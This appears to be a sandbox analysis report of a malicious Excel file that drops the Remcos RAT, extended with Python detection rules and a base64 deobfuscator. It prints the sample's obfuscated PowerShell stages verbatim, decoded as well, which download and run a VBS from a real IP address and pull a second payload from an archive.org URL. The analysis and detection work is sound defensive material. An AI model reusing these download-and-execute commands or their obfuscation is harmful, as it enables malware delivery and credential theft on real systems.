Windows Analysis Report: PO_304234.xls
Overview
General Information
Detection
Remcos
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign process
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
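The chain-style signatures in the list above (Suspicious Microsoft Office Child Process, Suspicious MSHTA Child Process, WScript or CScript Dropper, Change PowerShell Policies to an Insecure Level, PowerShell case anomaly, Dynamic .NET Compilation Via Csc.EXE) come down to parent/child and command-line checks on process-creation telemetry. The following is an added example, not Joe Sandbox or SigmaHQ code, that applies such checks to events modeled on this report's process tree. Explorer as the parent of EXCEL.EXE, the benign control event (PID 4242) and the case-anomaly scoring are my own constructions; the published Sigma rules match on other, more specific strings.

```python
import ntpath
import re

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
WSH = {"wscript.exe", "cscript.exe"}
SCRIPT_HOSTS = WSH | {"mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SHELLS = POWERSHELL | {"cmd.exe"}

ALPHA_RUN = re.compile(r"[A-Za-z]+")
EXEC_POLICY_BYPASS = re.compile(r"-(?:ex|ep|executionpolicy)\s+bypass", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)


def image_name(path):
    """Lower-cased file name of a Windows path; ntpath splits on backslashes on any OS."""
    return ntpath.basename(path).lower()


def odd_case_score(token):
    """Heuristic for the 'PowerShell case anomaly' idea (my own, not the Sigma logic):
    count upper-case letters that neither start a letter run nor sit inside an
    all-caps run (acronym).  PascalCase scores about 1 per word; poWerSHeLL scores 5."""
    score = 0
    for run in ALPHA_RUN.findall(token):
        if run.isupper():
            continue
        score += sum(1 for c in run[1:] if c.isupper())
    return score


def case_anomaly(cmdline, threshold=3):
    return any(odd_case_score(tok) >= threshold for tok in cmdline.split())


def is_ps(e):
    return image_name(e["image"]) in POWERSHELL


# (rule name, predicate over one process-creation event)
RULES = [
    ("office_spawns_child", lambda e: image_name(e["parent"]) in OFFICE
     and image_name(e["image"]) in SCRIPT_HOSTS | SHELLS),
    ("mshta_spawns_shell", lambda e: image_name(e["parent"]) == "mshta.exe"
     and image_name(e["image"]) in SHELLS | SCRIPT_HOSTS),
    ("wsh_spawns_powershell", lambda e: image_name(e["parent"]) in WSH
     and image_name(e["image"]) in SHELLS),
    ("wsh_runs_script_from_appdata", lambda e: image_name(e["image"]) in WSH
     and "\\appdata\\" in e["cmdline"].lower()),
    ("csc_compiles_from_temp", lambda e: image_name(e["image"]) == "csc.exe"
     and "\\appdata\\local\\temp\\" in e["cmdline"].lower()),
    ("ps_execution_policy_bypass", lambda e: is_ps(e) and bool(EXEC_POLICY_BYPASS.search(e["cmdline"]))),
    ("ps_hidden_window", lambda e: is_ps(e) and bool(HIDDEN_WINDOW.search(e["cmdline"]))),
    ("ps_base64_decode", lambda e: is_ps(e) and "frombase64string" in e["cmdline"].lower()),
    ("ps_case_anomaly", lambda e: is_ps(e) and case_anomaly(e["cmdline"])),
]


def evaluate(events):
    """Return (pid, rule) for every rule each event trips, in event order."""
    return [(e["pid"], name) for e in events for name, pred in RULES if pred(e)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
XL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
# Events modeled on the report's process tree; long command lines are cut down to
# the tokens the rules look at.  Explorer as Excel's parent and PID 4242 are constructed.
EVENTS = [
    {"pid": 3528, "image": XL, "parent": r"C:\Windows\explorer.exe",
     "cmdline": '"' + XL + '" /automation -Embedding'},
    {"pid": 3776, "image": r"C:\Windows\System32\mshta.exe", "parent": XL,
     "cmdline": r"C:\Windows\System32\mshta.exe -Embedding"},
    {"pid": 3888, "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c ..."'},
    {"pid": 3912, "image": PS, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; "
                "iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG("
                "[sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+"
                "'<base64 elided>'+[cHAR]34+'))')))"},
    {"pid": 4012, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", "parent": PS,
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
                r'@"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline"'},
    {"pid": 3104, "image": r"C:\Windows\System32\WScript.exe", "parent": PS,
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"'},
    {"pid": 3180, "image": PS, "parent": r"C:\Windows\System32\WScript.exe",
     "cmdline": '"' + PS + "\" -command $Codigo = '<padded base64 elided>'"},
    {"pid": 4242, "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": '"' + PS + '" -NoProfile -Command Get-ChildItem $env:TEMP'},
]

if __name__ == "__main__":
    for pid, rule in evaluate(EVENTS):
        print(pid, rule)
```

Run stand-alone it prints one line per hit. The PID 3912 PowerShell trips four rules on its own (policy bypass, hidden window, FromBase64String, case anomaly), which is the stacking that pushes a chain like this to a high score before Remcos itself is ever unpacked; the interactive PowerShell under Explorer trips none.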
Classification
- System is w7x64
- EXCEL.EXE (PID: 3528 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  - mshta.exe (PID: 3776 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
    - cmd.exe (PID: 3888 cmdline: "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      - powershell.exe (PID: 3912 cmdline: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24g...'+[cHAR]34+'))'))), the command cmd.exe passes after /c, repeated verbatim in the report MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        - csc.exe (PID: 4012 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          - cvtres.exe (PID: 4020 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES89F7.tmp" "c:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        - wscript.exe (PID: 3104 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" MD5: 045451FA238A75305CC26AC982472367)
          - powershell.exe (PID: 3180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '...' ; the base64 literal is cut off in the report and no MD5 is shown for this process)

Notes on the two PowerShell command lines:

The first (PIDs 3888/3912) runs DEvICEcrEDENTiAlDEPlOyMeNT.EXe, a signed Windows binary that LOLBAS documents as a way to hide the console window, and then a double Invoke-Expression. The [char] pieces are ':' (58 and 0x3a) and '"' (34), so the inner ieX assembles [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("...")) and the outer iEX runs what it returns. With the whitespace padding collapsed, that script is: $1HieM7n = aDD-TyPE -memBerdEFIniTIOn '[DllImport("UrLMOn.DLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr vE,string tbBn,string zCrVCZth,uint jKFGSfwvaiR,IntPtr MnTOq);' -nAME "vQwQONIjUcm" -nAMEsPAce MAg -PassThru; $1HieM7n::URLDownloadToFile(0,"http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF","$Env:APPDATA\wecreatedbuttersmoothbutterthin.vBS",0,0);START-sLEep(3);sTaRt "$Env:APPDATA\wecreatedbuttersmoothbutterthin.vBS". The Add-Type compile is what produces the csc.exe and cvtres.exe children, and the started .vBS is the wscript.exe child.

The second (PID 3180) is the script that .vBS launches. Its $Codigo literal contains runs of five characters the report renders as "?"; each run sits where the base64 alphabet needs an "A", and with that substitution the literal is UTF-16LE base64 that, as far as the report shows it, decodes to: $imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes (truncated in the report). This is the stage that the "Powershell download and load assembly" Sigma and Yara hits refer to.
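The first PowerShell stage in the tree above hides its script behind [char] concatenation and a base64 literal that UTF8.GetString turns back into text. Below is an added example, not part of the report and not Joe Sandbox code, of how to unwrap that layer offline and pull the indicators out of it. The base64 is the sample's own literal transcribed from the cmd.exe entry (with the report's line-wrapping spaces left in and stripped in code); the regexes and the analyze/decode_stage/extract_iocs helpers are my own.

```python
import base64
import re

# The literal handed to FromBase64String by the mshta -> cmd -> powershell stage,
# transcribed from the report with its line-wrapping spaces left in (stripped
# below).  This is the sample's own payload, not constructed data.
STAGE1_B64_WRAPPED = """
JD FIaWVNN24g ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg PSAgICAgIC AgICAgICAg
ICAgICAgIC AgICAgICAg ICBhREQtVH lQRSAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtbWVt
QmVyZEVGSW 5pVElPbiAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAn W0RsbEltcG 9ydCgiVXJM
TU9uLkRMTC IsICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIENoYXJT ZXQgPSBDaG FyU2V0LlVu
aWNvZGUpXX B1YmxpYyBz dGF0aWMgZX h0ZXJuIElu dFB0ciBVUk xEb3dubG9h ZFRvRmlsZS hJbnRQdHIg
ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg dkUsc3RyaW 5nICAgICAg ICAgICAgIC AgICAgICAg
ICAgICAgIC AgIHRiQm4s c3RyaW5nIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIH pDclZDWnRo
LHVpbnQgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgak tGR1Nmd3Zh aVIsSW50UH RyICAgICAg
ICAgICAgIC AgICAgICAg ICAgICAgIC AgIE1uVE9x KTsnICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg
ICAgIC1uQU 1FICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICJ2UXdR T05JalVjbS IgICAgICAg
ICAgICAgIC AgICAgICAg ICAgICAgIC AgLW5BTUVz UEFjZSAgIC AgICAgICAg ICAgICAgIC AgICAgICAg
ICAgICBNQW cgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgLVBhc3NU aHJ1OyAgIC AgICAgICAg
ICAgICAgIC AgICAgICAg ICAgICAkMU hpZU03bjo6 VVJMRG93bm xvYWRUb0Zp bGUoMCwiaH R0cDovLzE5
Mi4zLjE5My 4xNTUveGFt cHAvYm96L3 dlY3JlYXRl ZGJ1dHRlcn Ntb290aGJ1 dHRlcnRoaW 5ncy50SUYi
LCIkRW52Ok FQUERBVEFc d2VjcmVhdG VkYnV0dGVy c21vb3RoYn V0dGVydGhp bi52QlMiLD AsMCk7U1RB
UlQtc0xFZX AoMyk7c1Rh UnQgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIiRFbn Y6QVBQREFU
QVx3ZWNyZW F0ZWRidXR0 ZXJzbW9vdG hidXR0ZXJ0 aGluLnZCUy I=
"""
STAGE1_B64 = re.sub(r"\s+", "", STAGE1_B64_WRAPPED)

# The wrapper exactly as the report shows it, with the literal substituted in.
STAGE1_CMDLINE = (
    "poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; "
    "iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG("
    "[sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'"
    + STAGE1_B64 + "'+[cHAR]34+'))')))"
)

CHAR_CAST = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.I)
B64_ARG = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)"', re.I)
PINVOKE = re.compile(r'\[DllImport\("([^"]+)"[^\]]*\]\s*public static extern \w+ (\w+)\(', re.I)


def fold_char_casts(ps):
    """Resolve [char]N / [char]0xNN pieces and the '+' joins around them,
    e.g. '[a]'+[Char]58+[CHAr]58+'b'  ->  '[a]::b'."""
    folded = CHAR_CAST.sub(lambda m: "'" + chr(int(m.group(1), 0)) + "'", ps)
    return folded.replace("'+'", "")


def decode_stage(ps):
    """Return the script hidden behind UTF8.GetString(FromBase64String("...")),
    padding whitespace collapsed, or None when no such literal is present."""
    m = B64_ARG.search(fold_char_casts(ps))
    if not m:
        return None
    raw = base64.b64decode(m.group(1)).decode("utf-8", errors="replace")
    return re.sub(r"\s+", " ", raw).strip()


def extract_iocs(script):
    """Pull the network, file-system and P/Invoke indicators out of the stage."""
    return {
        "urls": sorted(set(re.findall(r"https?://[^\s'\"]+", script))),
        "paths": sorted(set(re.findall(r"\$Env:\w+\\[^\s'\"]+", script, re.I))),
        "pinvoke": PINVOKE.findall(script),
        "add_type": bool(re.search(r"add-type", script, re.I)),
    }


def analyze(cmdline):
    script = decode_stage(cmdline)
    return {"script": script, **(extract_iocs(script) if script else {})}


if __name__ == "__main__":
    result = analyze(STAGE1_CMDLINE)
    print(result["script"])
    for key in ("urls", "paths", "pinvoke"):
        print(key, result[key])
```

The decoded stage P/Invokes urlmon!URLDownloadToFile to fetch the .tIF (which is really a VBS) into %APPDATA% and then starts it, which is exactly the wscript.exe entry in the tree; the download URL and the dropped path are the two indicators worth blocking from this layer. Decoding with errors="replace" rather than strict UTF-8 is deliberate: a transcription slip or a deliberately corrupt byte should not abort triage of the rest of the script.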